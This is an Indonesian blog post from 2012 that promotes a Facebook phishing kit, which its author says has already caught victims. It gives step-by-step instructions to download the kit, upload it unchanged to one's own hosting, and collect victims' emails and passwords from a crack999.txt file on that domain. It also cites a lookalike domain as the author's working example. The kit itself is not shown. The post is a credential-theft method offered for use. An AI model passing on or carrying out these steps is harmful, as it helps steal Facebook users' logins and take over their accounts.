Share tutorial menarik dan tips unik seputar blogger.

Tuesday 3 July 2012

Phising Facebook 2012 terbukti berhasil !

salam sahabat blogger, kali ini saya share Phising Facebook 2012 terbukti berhasil !, kenapa saya bilang terbukti berhasil ?
karna saya sendiri telah membuktikannya dan mendapatkan beberapa target yg lumayan cukup !
ok deh tanpa banyak kata kata lagi, langsung saya jelaskan cara pemakai'an nya !

Tutorial:
1. Download dulu file nya KLIK HERE
2. setelah di download ke komputer agan langsung di Extract aja,
3. setelah di Extract langsung upload ke Hosting kalian masing masing, [Jangan di Edit Apa - apa] Karna file sudah saya edit, jika kalian edit [Kesalahan Tanggung sendiri]
4. setelah itu, udeh siap deh, kalau kalian mau tau di mana keberadaan user password yg terjebak, kalian bisa tambah "crack999.txt" di belakang domain kalian tadi,
Contoh:
domainkamu.com/crack999.txt

berikut contoh gambar setelah mendapat target !






lihat di bagian :
email =
pass =


di situlah email dan password target kalian !



CONTOH WEB SAYA : www.facebluk.com


Semoga Artikel ini bermanfaat bagi sahabat blogger dan hacking lainnya !

Share on Facebook
Share on Twitter
Share on Google+

Related : Phising Facebook 2012 terbukti berhasil !

0 comments:

Post a Comment

Tidak boleh spam
tidak boleh ceplas ceplos

berkomentarlah dengan baik, karena kriteria orang bisa di nilai dari apayang dia komentari :)